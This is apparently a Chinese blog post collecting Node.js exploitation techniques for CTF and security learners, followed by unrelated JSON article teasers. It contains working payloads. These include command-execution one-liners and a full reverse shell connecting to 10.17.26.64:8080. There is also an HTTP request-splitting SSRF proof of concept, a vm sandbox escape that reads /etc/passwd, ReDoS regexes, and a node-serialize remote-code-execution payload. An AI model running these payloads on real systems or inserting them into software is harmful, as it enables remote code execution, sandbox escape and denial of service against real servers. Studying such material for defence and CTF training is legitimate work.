百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 编程字典 > 正文

黑客必学Nodejs 漏洞总结

toyiye 2024-06-21 12:15 21 浏览 0 评论

Nodejs 相关漏洞总结


命令执行

require('child_porcess').execSync('id');
global.process.mainModule.constructor._load('child_process').execSync('id');
require('fs').readdirSync('.').toString()
require('fs').readFileSync('a.js','utf-8')
require('fs').writeFileSync('message.txt','hello')
({}).constructor.constructor
// 反弹shell
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})();

http拆分攻击

漏洞原理

具体见 这里

根据 这里
,漏洞范围在[6.0.0, 6.15.0) 和 [8.0.0, 8.14.0) 版本以内的nodejs都存在这个问题。

简而言之,漏洞原因是当http包在处理http请求路径时,默认使用了 latin1
单字节编码字符集,当我们的请求路径中含有多字节编码的unicode字符时,会被截断取最低字节。

比如 u0130
就会被截断为 u30


为了避免crlf注入,nodejs也会将输入的 rn
url编码为 %0d%0a
,但是我们可以通过上面的漏洞就可以绕过。

%C4%8D%C4%8A
代替 rn
就可以绕过


漏洞利用

一般是用做SSRF,通过crlf注入,向服务器发送走私内容。一般用来绕过内网限制。

下面是一个漏洞POC, 在存在漏洞的nodejs版本运行可以很形象的观察漏洞,来源于 这里

const http = require('http')
const server = http.createServer((req, res) => {
console.log(req.url);
res.end();
});
server.listen(8000, function() {
http.get('http://127.0.0.1:8000/?param=xu{0120}HTTP/1.1u{010D}u{010A}Host:{u0120}127.0.0.1:8000u{010D}u{010A}u{010D}u{010A}GETu{0120}/private', function() {
});
});

沙箱逃逸

vm

The vm module is not a security mechanism. Do not use it to run untrusted code.

vm
官方文档
也已经说了它是一个不安全的模块,而它也很容易逃逸。

在javascript中 this
是对当前对象的一个引用,那么在vm中的 this
指的就是vm上下文,说明已经是处于vm上下文之外了。

.constructor.constructor
可以索引到Function,创建匿名函数。那么在这个匿名函数中的 this
就是外部的 this

const vm = require("vm");
const result = vm.runInNewContext(`var process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(result)

这样就能取到沙箱外的process,执行命令了。

vm2

vm2
号称是能安全的执行不信任的代码的,默认情况下只有Javascript内置对象和Buffer可以访问。它内部使用vm模块创建上下文,并且通过JavaScript的Proxy机制防止逃逸出沙箱。

只要在运行过程中获取到任何一个外部的对象,就可以索引到外部的this。 这篇文章
是通过制造错误,引起外部报错,再捕获外部的报错实现逃逸的(已修复)。

XmiliaH
对很多个版本都有逃逸,但最新版都已修复。

reDos 漏洞

正则回溯导致的Dos漏洞。

除了导致Dos,还可以在某些环境下猜测被匹配的字符串。今年的xctf抗疫高校分享赛就有一道这样的题。

这里也有一个猜测字符串的 例子

下面有两个收集到的payload

/^((.*)+)+xxxx$/                 不以xxxx结尾则dos
/^(?=xxxx)(((.*)*)*)*salt$/     以xxxx开头则dos

javascript 原型链污染

大致原理和CTF题目分析我以前分析过,这里不赘述

其他

node_serialize 漏洞

node_modulesnode-serializelibserialize.js
中非常简单的代码

反序列化时,使用eval处理 _$ND_FUNC$_
开头的代码

var FUNCFLAG = '_$ND_FUNC$_';
if(obj[key].indexOf(FUNCFLAG) === 0) {
obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');

直接注入就行

var serialize = require('node-serialize');
var payload = '{"rce":"_$ND_FUNC$_require('child_process').exec('ls /',function(error, stdout, stderr){console.log(stdout)})"}';
serialize.unserialize(payload);

没有必要用IIFE

javascript 大小写特性

在toUpperCase()函数中,字符 ?
会转变为 I
,字符 ?
会变为 S
。在toLowerCase()函数中,字符 ?
会转变为 k

Node Js unicode failure

blackhat
上提出来的,原理与拆分攻击类似。因为内部使用UCS-2编码,也是在处理path时对unicode时对高位的截断。

比如 xFFx2E
会被截断为 x2E
,其中 xFFx2E
也就是

比如 x01x25
会被截断为 x25
,其中 x01x25
也就是 ?

这个知识点在CSAW2017出了几道题,我测试发现老版本的nodejs仍存在这个问题。

参考

https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html

https://xz.aliyun.com/t/7184

https://hpdoger.cn/2019/12/01/I-SOON2019-Membershop%E5%87%BA%E9%A2%98%E6%80%9D%E8%B7%AF/

https://diary.shift-js.info/blind-regular-expression-injection/

https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

相关推荐

为何越来越多的编程语言使用JSON(为什么编程)

JSON是JavascriptObjectNotation的缩写,意思是Javascript对象表示法,是一种易于人类阅读和对编程友好的文本数据传递方法,是JavaScript语言规范定义的一个子...

何时在数据库中使用 JSON(数据库用json格式存储)

在本文中,您将了解何时应考虑将JSON数据类型添加到表中以及何时应避免使用它们。每天?分享?最新?软件?开发?,Devops,敏捷?,测试?以及?项目?管理?最新?,最热门?的?文章?,每天?花?...

MySQL 从零开始:05 数据类型(mysql数据类型有哪些,并举例)

前面的讲解中已经接触到了表的创建,表的创建是对字段的声明,比如:上述语句声明了字段的名称、类型、所占空间、默认值和是否可以为空等信息。其中的int、varchar、char和decimal都...

JSON对象花样进阶(json格式对象)

一、引言在现代Web开发中,JSON(JavaScriptObjectNotation)已经成为数据交换的标准格式。无论是从前端向后端发送数据,还是从后端接收数据,JSON都是不可或缺的一部分。...

深入理解 JSON 和 Form-data(json和formdata提交区别)

在讨论现代网络开发与API设计的语境下,理解客户端和服务器间如何有效且可靠地交换数据变得尤为关键。这里,特别值得关注的是两种主流数据格式:...

JSON 语法(json 语法 priority)

JSON语法是JavaScript语法的子集。JSON语法规则JSON语法是JavaScript对象表示法语法的子集。数据在名称/值对中数据由逗号分隔花括号保存对象方括号保存数组JS...

JSON语法详解(json的语法规则)

JSON语法规则JSON语法是JavaScript对象表示法语法的子集。数据在名称/值对中数据由逗号分隔大括号保存对象中括号保存数组注意:json的key是字符串,且必须是双引号,不能是单引号...

MySQL JSON数据类型操作(mysql的json)

概述mysql自5.7.8版本开始,就支持了json结构的数据存储和查询,这表明了mysql也在不断的学习和增加nosql数据库的有点。但mysql毕竟是关系型数据库,在处理json这种非结构化的数据...

JSON的数据模式(json数据格式示例)

像XML模式一样,JSON数据格式也有Schema,这是一个基于JSON格式的规范。JSON模式也以JSON格式编写。它用于验证JSON数据。JSON模式示例以下代码显示了基本的JSON模式。{"...

前端学习——JSON格式详解(后端json格式)

JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式。易于人阅读和编写。同时也易于机器解析和生成。它基于JavaScriptProgrammingLa...

什么是 JSON:详解 JSON 及其优势(什么叫json)

现在程序员还有谁不知道JSON吗?无论对于前端还是后端,JSON都是一种常见的数据格式。那么JSON到底是什么呢?JSON的定义...

PostgreSQL JSON 类型:处理结构化数据

PostgreSQL提供JSON类型,以存储结构化数据。JSON是一种开放的数据格式,可用于存储各种类型的值。什么是JSON类型?JSON类型表示JSON(JavaScriptO...

JavaScript:JSON、三种包装类(javascript 包)

JOSN:我们希望可以将一个对象在不同的语言中进行传递,以达到通信的目的,最佳方式就是将一个对象转换为字符串的形式JSON(JavaScriptObjectNotation)-JS的对象表示法...

Python数据分析 只要1分钟 教你玩转JSON 全程干货

Json简介:Json,全名JavaScriptObjectNotation,JSON(JavaScriptObjectNotation(记号、标记))是一种轻量级的数据交换格式。它基于J...

比较一下JSON与XML两种数据格式?(json和xml哪个好)

JSON(JavaScriptObjectNotation)和XML(eXtensibleMarkupLanguage)是在日常开发中比较常用的两种数据格式,它们主要的作用就是用来进行数据的传...

取消回复欢迎 发表评论:

请填写验证码